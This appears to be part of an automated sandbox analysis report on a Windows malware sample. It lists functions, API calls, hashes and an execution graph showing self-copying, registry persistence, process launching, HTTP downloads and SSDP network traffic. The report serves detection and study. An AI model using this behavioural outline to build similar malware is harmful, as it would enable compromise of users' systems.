                                                                                                                                    • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                    Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                    • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                    • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                    • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                    • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                    Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                      • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                      • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                      • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                      • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                      • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                      • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                      • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                      • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                      • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                      • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                    • String ID: %S%S
                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                    • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                    • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                    • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                    • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                    Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                      • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                      • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                      • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                      • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                      • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                      • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                      • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                    • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                    • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                    Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                    • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                    • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                    • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                    • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:22.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1512
                                                                                                                                    Total number of Limit Nodes:37
                                                                                                                                    execution_graph 4453 407940 Sleep CreateMutexA GetLastError 4454 407976 ExitProcess 4453->4454 4455 40797e 6 API calls 4453->4455 4456 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4455->4456 4457 407a23 4455->4457 4459 407dcb RegOpenKeyExW 4456->4459 4460 407d9f RegSetValueExW RegCloseKey 4456->4460 4622 40f1b0 GetLocaleInfoA strcmp 4457->4622 4461 407e24 RegOpenKeyExW 4459->4461 4462 407df8 RegSetValueExW RegCloseKey 4459->4462 4460->4459 4464 407e51 RegSetValueExW RegCloseKey 4461->4464 4465 407e7d RegOpenKeyExW 4461->4465 4462->4461 4464->4465 4468 407ed6 RegOpenKeyExW 4465->4468 4469 407eaa RegSetValueExW RegCloseKey 4465->4469 4466 407a30 ExitProcess 4467 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4470 407b36 Sleep wsprintfW CopyFileW 4467->4470 4471 407a8c SetFileAttributesW RegOpenKeyExW 4467->4471 4472 407f03 RegSetValueExW RegCloseKey 4468->4472 4473 407f2f RegOpenKeyExW 4468->4473 4469->4468 4475 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4470->4475 4476 407b7e SetFileAttributesW RegOpenKeyExW 4470->4476 4471->4470 4474 407ac8 wcslen RegSetValueExW 4471->4474 4472->4473 4478 407f88 RegOpenKeyExW 4473->4478 4479 407f5c RegSetValueExW RegCloseKey 4473->4479 4480 407b29 RegCloseKey 4474->4480 4481 407afd RegCloseKey 4474->4481 4475->4456 4477 407c87 SetFileAttributesW RegOpenKeyExW 4475->4477 4476->4475 4482 407bba wcslen RegSetValueExW 4476->4482 4477->4456 4485 407cc3 wcslen RegSetValueExW 4477->4485 4487 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4478->4487 4488 40801f RegOpenKeyExW 4478->4488 4479->4478 4480->4470 4624 40f400 memset memset CreateProcessW 4481->4624 4483 407c1b RegCloseKey 4482->4483 4484 407bef RegCloseKey 4482->4484 4483->4475 4489 40f400 6 API calls 4484->4489 4490 407d24 RegCloseKey 4485->4490 4491 407cf8 RegCloseKey 4485->4491 4487->4488 4493 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4488->4493 4494 4080d9 RegOpenKeyExW 4488->4494 4495 407c08 4489->4495 4490->4456 4496 40f400 6 API calls 4491->4496 4493->4494 4498 4081f0 RegOpenKeyExW 4494->4498 4499 40810a 8 API calls 4494->4499 4495->4483 4502 407c13 ExitProcess 4495->4502 4503 407d11 4496->4503 4497 407b21 ExitProcess 4500 408221 8 API calls 4498->4500 4501 408307 Sleep 4498->4501 4499->4498 4500->4501 4533 40d180 4501->4533 4503->4490 4505 407d1c ExitProcess 4503->4505 4507 408491 4508 408322 9 API calls 4536 405c00 InitializeCriticalSection CreateFileW 4508->4536 5834 4077f0 4508->5834 5841 4058c0 4508->5841 5850 406f70 Sleep GetModuleFileNameW 4508->5850 4514 4083d7 CreateEventA 4568 40c8b0 4514->4568 4523 40dbe0 341 API calls 4524 408438 4523->4524 4525 40dbe0 341 API calls 4524->4525 4526 408453 4525->4526 4527 40dbe0 341 API calls 4526->4527 4528 40846f 4527->4528 4613 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4528->4613 4530 408480 4630 40de90 4530->4630 4639 40d150 4533->4639 4537 405d25 4536->4537 4538 405c38 CreateFileMappingW 4536->4538 4550 40e0c0 CoInitializeEx 4537->4550 4539 405c59 MapViewOfFile 4538->4539 4540 405d1b CloseHandle 4538->4540 4541 405d11 CloseHandle 4539->4541 4542 405c78 GetFileSize 4539->4542 4540->4537 4541->4540 4546 405c8d 4542->4546 4543 405d07 UnmapViewOfFile 4543->4541 4544 405c9c 4544->4543 4546->4543 4546->4544 4547 405ccc 4546->4547 4768 40d1d0 4546->4768 4775 405d30 4546->4775 4548 40ab60 __aligned_recalloc_base 3 API calls 4547->4548 4548->4544 5083 40e190 socket 4550->5083 4552 4083d2 4563 407390 CoInitializeEx SysAllocString 4552->4563 4553 40e168 5127 40ac80 4553->5127 4556 40e0e0 4556->4552 4556->4553 4557 40e12a 4556->4557 5093 40e400 4556->5093 5108 40b430 htons 4557->5108 4562 40eef0 24 API calls 4562->4553 4564 4073b2 4563->4564 4565 4073c8 CoUninitialize 4563->4565 5272 4073e0 4564->5272 4565->4514 5281 40c870 4568->5281 4571 40c870 3 API calls 4572 40c8ce 4571->4572 4573 40c870 3 API calls 4572->4573 4574 40c8de 4573->4574 4575 40c870 3 API calls 4574->4575 4576 4083ef 4575->4576 4577 40dbb0 4576->4577 4578 40a740 7 API calls 4577->4578 4579 40dbbb 4578->4579 4580 4083f9 4579->4580 4581 40dbc7 InitializeCriticalSection 4579->4581 4582 40bc70 InitializeCriticalSection 4580->4582 4581->4580 4589 40bc8a 4582->4589 4583 40bcb9 CreateFileW 4585 40bce0 CreateFileMappingW 4583->4585 4586 40bda2 4583->4586 4587 40bd01 MapViewOfFile 4585->4587 4588 40bd98 CloseHandle 4585->4588 5336 40b510 EnterCriticalSection 4586->5336 4591 40bd1c GetFileSize 4587->4591 4592 40bd8e CloseHandle 4587->4592 4588->4586 4589->4583 5288 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4589->5288 5289 40b850 4589->5289 4599 40bd3b 4591->4599 4592->4588 4594 40bda7 4595 40dbe0 341 API calls 4594->4595 4596 408403 4595->4596 4601 40dbe0 4596->4601 4597 40bd84 UnmapViewOfFile 4597->4592 4599->4597 4600 40b850 32 API calls 4599->4600 5339 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4599->5339 4600->4599 4602 40dbf7 EnterCriticalSection 4601->4602 4603 40841c 4601->4603 5364 40dcd0 4602->5364 4603->4523 4606 40dcbb LeaveCriticalSection 4606->4603 4607 40a990 9 API calls 4608 40dc39 4607->4608 4608->4606 4609 40dc4b CreateThread 4608->4609 4609->4606 4610 40dc6e 4609->4610 5369 40bdd0 4609->5369 5375 40dfd0 4609->5375 5386 401f50 GetQueuedCompletionStatus 4609->5386 5393 40e070 4609->5393 5400 40d980 4609->5400 5407 401920 GetTickCount WaitForSingleObject 4609->5407 5430 40d930 4609->5430 4611 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4610->4611 4612 40dcb4 4610->4612 4611->4612 4612->4606 4614 40dd86 InterlockedExchangeAdd 4613->4614 4615 40de69 GetCurrentThread SetThreadPriority 4613->4615 4614->4615 4620 40dda0 4614->4620 4615->4530 4616 40ddb9 EnterCriticalSection 4616->4620 4617 40de27 LeaveCriticalSection 4619 40de3e 4617->4619 4617->4620 4618 40de03 WaitForSingleObject 4618->4620 4619->4615 4620->4615 4620->4616 4620->4617 4620->4618 4620->4619 4621 40de5c Sleep 4620->4621 4621->4620 4623 407a28 4622->4623 4623->4466 4623->4467 4625 40f471 ShellExecuteW 4624->4625 4626 40f462 Sleep 4624->4626 4628 40f4a6 4625->4628 4629 40f497 Sleep 4625->4629 4627 407b16 4626->4627 4627->4480 4627->4497 4628->4627 4629->4627 4631 40848e 4630->4631 4632 40de9c EnterCriticalSection 4630->4632 4631->4507 4633 40deb8 4632->4633 4634 40dee0 LeaveCriticalSection DeleteCriticalSection 4633->4634 4635 40decb CloseHandle 4633->4635 4636 40ab60 __aligned_recalloc_base 3 API calls 4634->4636 4635->4633 4637 40df06 4636->4637 4638 40ab60 __aligned_recalloc_base 3 API calls 4637->4638 4638->4631 4642 40cda0 4639->4642 4643 40cdd3 4642->4643 4644 40cdbe 4642->4644 4645 408317 4643->4645 4648 40cf80 4643->4648 4682 40ce00 4644->4682 4645->4507 4645->4508 4649 40cfa9 4648->4649 4650 40d05a 4648->4650 4681 40d052 4649->4681 4708 40a740 4649->4708 4653 40a740 7 API calls 4650->4653 4650->4681 4654 40d07e 4653->4654 4657 402420 7 API calls 4654->4657 4654->4681 4659 40d0a2 4657->4659 4658 40a740 7 API calls 4661 40cff2 4658->4661 4660 40a740 7 API calls 4659->4660 4662 40d0b1 4660->4662 4716 4024e0 4661->4716 4665 4024e0 10 API calls 4662->4665 4664 40d01b 4719 40ab60 4664->4719 4667 40d0da 4665->4667 4669 40ab60 __aligned_recalloc_base 3 API calls 4667->4669 4671 40d0e6 4669->4671 4670 402420 7 API calls 4672 40d038 4670->4672 4673 402420 7 API calls 4671->4673 4674 4024e0 10 API calls 4672->4674 4675 40d0f7 4673->4675 4674->4681 4676 4024e0 10 API calls 4675->4676 4677 40d111 4676->4677 4678 402420 7 API calls 4677->4678 4679 40d122 4678->4679 4680 4024e0 10 API calls 4679->4680 4680->4681 4681->4645 4683 40ceb2 4682->4683 4684 40ce29 4682->4684 4686 40a740 7 API calls 4683->4686 4707 40ceaa 4683->4707 4685 40a740 7 API calls 4684->4685 4684->4707 4687 40ce3c 4685->4687 4688 40ced8 4686->4688 4689 402420 7 API calls 4687->4689 4687->4707 4690 402420 7 API calls 4688->4690 4688->4707 4691 40ce65 4689->4691 4692 40cf05 4690->4692 4693 4024e0 10 API calls 4691->4693 4694 4024e0 10 API calls 4692->4694 4695 40ce7f 4693->4695 4696 40cf1f 4694->4696 4697 402420 7 API calls 4695->4697 4699 402420 7 API calls 4696->4699 4698 40ce90 4697->4698 4700 4024e0 10 API calls 4698->4700 4701 40cf30 4699->4701 4700->4707 4702 4024e0 10 API calls 4701->4702 4703 40cf4a 4702->4703 4704 402420 7 API calls 4703->4704 4705 40cf5b 4704->4705 4706 4024e0 10 API calls 4705->4706 4706->4707 4707->4645 4726 40a760 4708->4726 4711 402420 4747 40a950 4711->4747 4754 402540 4716->4754 4718 4024ff __aligned_recalloc_base 4718->4664 4764 40a800 GetCurrentProcessId 4719->4764 4721 40ab6b 4722 40ab72 4721->4722 4765 40aaa0 4721->4765 4722->4670 4725 40ab87 RtlFreeHeap 4725->4722 4735 40a800 GetCurrentProcessId 4726->4735 4728 40a76b 4729 40a777 __aligned_recalloc_base 4728->4729 4736 40a820 4728->4736 4730 40a74e 4729->4730 4732 40a792 RtlAllocateHeap 4729->4732 4730->4681 4730->4711 4732->4730 4733 40a7b9 __aligned_recalloc_base 4732->4733 4733->4730 4734 40a7d4 memset 4733->4734 4734->4730 4735->4728 4744 40a800 GetCurrentProcessId 4736->4744 4738 40a829 4739 40a846 HeapCreate 4738->4739 4745 40a890 GetProcessHeaps 4738->4745 4741 40a860 HeapSetInformation GetCurrentProcessId 4739->4741 4742 40a887 4739->4742 4741->4742 4742->4729 4744->4738 4746 40a83c 4745->4746 4746->4739 4746->4742 4748 40a760 __aligned_recalloc_base 7 API calls 4747->4748 4749 40242b 4748->4749 4750 402820 4749->4750 4751 40282a 4750->4751 4752 40a950 __aligned_recalloc_base 7 API calls 4751->4752 4753 402438 4752->4753 4753->4658 4755 40258e 4754->4755 4762 402551 4754->4762 4756 40a950 __aligned_recalloc_base 7 API calls 4755->4756 4755->4762 4759 4025b2 _invalid_parameter 4756->4759 4757 4025e2 memcpy 4758 402606 _invalid_parameter 4757->4758 4760 40ab60 __aligned_recalloc_base 3 API calls 4758->4760 4759->4757 4761 40ab60 __aligned_recalloc_base 3 API calls 4759->4761 4760->4762 4763 4025df 4761->4763 4762->4718 4763->4757 4764->4721 4766 40aad0 HeapValidate 4765->4766 4767 40aaf0 4765->4767 4766->4767 4767->4722 4767->4725 4785 40abd0 4768->4785 4773 40ab60 __aligned_recalloc_base 3 API calls 4774 40d211 4773->4774 4774->4546 4998 40a990 4775->4998 4778 405d6a memcpy 4780 40abd0 8 API calls 4778->4780 4779 405e28 4779->4546 4781 405da1 4780->4781 5008 40cb40 4781->5008 4786 40abfd 4785->4786 4787 40a950 __aligned_recalloc_base 7 API calls 4786->4787 4788 40ac14 memcpy 4786->4788 4789 40ac12 4786->4789 4787->4786 4788->4786 4789->4774 4790 40c6e0 4789->4790 4792 40c6ea 4790->4792 4794 40c721 memcmp 4792->4794 4795 40c748 4792->4795 4796 40ab60 __aligned_recalloc_base 3 API calls 4792->4796 4798 40c709 4792->4798 4799 40cbd0 4792->4799 4813 4084a0 4792->4813 4794->4792 4797 40ab60 __aligned_recalloc_base 3 API calls 4795->4797 4796->4792 4797->4798 4798->4773 4798->4774 4800 40cbdf __aligned_recalloc_base 4799->4800 4801 40a950 __aligned_recalloc_base 7 API calls 4800->4801 4812 40cbe9 4800->4812 4802 40cc78 4801->4802 4803 402420 7 API calls 4802->4803 4802->4812 4804 40cc8d 4803->4804 4805 402420 7 API calls 4804->4805 4806 40cc95 4805->4806 4808 40cced __aligned_recalloc_base 4806->4808 4816 40cd40 4806->4816 4821 402470 4808->4821 4811 402470 3 API calls 4811->4812 4812->4792 4929 40a6c0 4813->4929 4817 4024e0 10 API calls 4816->4817 4818 40cd54 4817->4818 4827 4026f0 4818->4827 4820 40cd6c 4820->4806 4823 402484 _invalid_parameter 4821->4823 4824 4024ce 4821->4824 4822 40ab60 __aligned_recalloc_base 3 API calls 4822->4824 4825 40ab60 __aligned_recalloc_base 3 API calls 4823->4825 4826 4024ac 4823->4826 4824->4811 4825->4826 4826->4822 4830 402710 4827->4830 4829 40270a 4829->4820 4831 402724 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40276d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40277d 4834->4835 4836 402540 __aligned_recalloc_base 10 API calls 4835->4836 4837 40278d 4836->4837 4838 402540 __aligned_recalloc_base 10 API calls 4837->4838 4839 40279d 4838->4839 4840 4027a6 4839->4840 4841 4027cf 4839->4841 4845 403e20 4840->4845 4862 403df0 4841->4862 4844 4027c7 __aligned_recalloc_base 4844->4829 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e37 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e46 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4851 403e55 4850->4851 4852 402820 _invalid_parameter 7 API calls 4851->4852 4853 403e64 _invalid_parameter __aligned_recalloc_base 4852->4853 4855 40400f _invalid_parameter 4853->4855 4865 402850 4853->4865 4856 402850 _invalid_parameter 3 API calls 4855->4856 4857 404035 _invalid_parameter 4855->4857 4856->4855 4858 402850 _invalid_parameter 3 API calls 4857->4858 4859 40405b _invalid_parameter 4857->4859 4858->4857 4860 402850 _invalid_parameter 3 API calls 4859->4860 4861 404081 4859->4861 4860->4859 4861->4844 4869 404090 4862->4869 4864 403e0c 4864->4844 4866 402866 4865->4866 4867 40285b 4865->4867 4866->4853 4868 40ab60 __aligned_recalloc_base 3 API calls 4867->4868 4868->4866 4870 4040a6 _invalid_parameter 4869->4870 4871 4040dd 4870->4871 4873 4040b8 _invalid_parameter 4870->4873 4876 404103 4870->4876 4899 403ca0 4871->4899 4873->4864 4874 40413d 4909 404680 4874->4909 4875 40415e 4878 402820 _invalid_parameter 7 API calls 4875->4878 4876->4874 4876->4875 4879 40416f 4878->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40417e 4880->4881 4882 402820 _invalid_parameter 7 API calls 4881->4882 4883 40418d 4882->4883 4884 402820 _invalid_parameter 7 API calls 4883->4884 4885 40419c 4884->4885 4922 403d70 4885->4922 4887 402820 _invalid_parameter 7 API calls 4888 4041ca _invalid_parameter 4887->4888 4888->4887 4891 404284 _invalid_parameter __aligned_recalloc_base 4888->4891 4889 402850 _invalid_parameter 3 API calls 4889->4891 4890 4045a3 _invalid_parameter 4892 402850 _invalid_parameter 3 API calls 4890->4892 4893 4045c9 _invalid_parameter 4890->4893 4891->4889 4891->4890 4892->4890 4894 402850 _invalid_parameter 3 API calls 4893->4894 4895 4045ef _invalid_parameter 4893->4895 4894->4893 4896 402850 _invalid_parameter 3 API calls 4895->4896 4897 404615 _invalid_parameter 4895->4897 4896->4895 4897->4873 4898 402850 _invalid_parameter 3 API calls 4897->4898 4898->4897 4900 403cae 4899->4900 4901 402820 _invalid_parameter 7 API calls 4900->4901 4902 403ccb 4901->4902 4903 402820 _invalid_parameter 7 API calls 4902->4903 4904 403cda _invalid_parameter 4903->4904 4905 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4904->4905 4906 403d3a _invalid_parameter 4904->4906 4905->4904 4907 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4906->4907 4908 403d60 4906->4908 4907->4906 4908->4873 4910 402820 _invalid_parameter 7 API calls 4909->4910 4911 404697 4910->4911 4912 402820 _invalid_parameter 7 API calls 4911->4912 4913 4046a6 4912->4913 4914 402820 _invalid_parameter 7 API calls 4913->4914 4921 4046b5 _invalid_parameter __aligned_recalloc_base 4914->4921 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4915->4921 4916 404841 _invalid_parameter 4917 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4916->4917 4918 404867 _invalid_parameter 4916->4918 4917->4916 4919 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4918->4919 4920 40488d 4918->4920 4919->4918 4920->4873 4921->4915 4921->4916 4923 402820 _invalid_parameter 7 API calls 4922->4923 4924 403d7f _invalid_parameter 4923->4924 4925 403ca0 _invalid_parameter 9 API calls 4924->4925 4926 403db8 _invalid_parameter 4925->4926 4927 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4926->4927 4928 403de3 4926->4928 4927->4926 4928->4888 4930 40a6d2 4929->4930 4933 40a620 4930->4933 4934 40a950 __aligned_recalloc_base 7 API calls 4933->4934 4935 40a630 4934->4935 4937 40a66c 4935->4937 4940 4084bf 4935->4940 4942 409b50 4935->4942 4949 40a140 4935->4949 4954 40a510 4935->4954 4939 40ab60 __aligned_recalloc_base 3 API calls 4937->4939 4939->4940 4940->4792 4943 409b59 4942->4943 4944 409b63 4942->4944 4943->4935 4944->4943 4945 409ba6 memset 4944->4945 4945->4943 4946 409bc7 4945->4946 4946->4943 4947 409bcd memcpy 4946->4947 4962 409920 4947->4962 4950 40a14d 4949->4950 4951 40a157 4949->4951 4950->4935 4951->4950 4952 40a24f memcpy 4951->4952 4967 409e70 4951->4967 4952->4951 4955 40a526 4954->4955 4960 40a51c 4954->4960 4956 409e70 64 API calls 4955->4956 4955->4960 4957 40a5a7 4956->4957 4958 409920 6 API calls 4957->4958 4957->4960 4959 40a5c6 4958->4959 4959->4960 4961 40a5db memcpy 4959->4961 4960->4935 4961->4960 4963 40996e 4962->4963 4965 40992e 4962->4965 4963->4943 4965->4963 4966 409860 6 API calls 4965->4966 4966->4965 4968 409e80 4967->4968 4969 409e8a 4967->4969 4968->4951 4969->4968 4977 409cb0 4969->4977 4972 409fc8 memcpy 4972->4968 4974 409fe7 memcpy 4975 40a111 4974->4975 4976 409e70 62 API calls 4975->4976 4976->4968 4978 409cbd 4977->4978 4979 409cc7 4977->4979 4978->4968 4978->4972 4978->4974 4979->4978 4980 409d50 4979->4980 4982 409d55 4979->4982 4983 409d38 4979->4983 4988 409610 4980->4988 4986 409920 6 API calls 4982->4986 4985 409920 6 API calls 4983->4985 4985->4980 4986->4980 4987 409dfc memset 4987->4978 4989 40961f 4988->4989 4990 409629 4988->4990 4989->4978 4989->4987 4990->4989 4991 4094e0 9 API calls 4990->4991 4992 409722 4991->4992 4993 40a950 __aligned_recalloc_base 7 API calls 4992->4993 4994 409771 4993->4994 4994->4989 4995 409350 46 API calls 4994->4995 4996 40979e 4995->4996 4997 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4996->4997 4997->4989 5017 40a800 GetCurrentProcessId 4998->5017 5000 40a99b 5001 40a820 __aligned_recalloc_base 5 API calls 5000->5001 5007 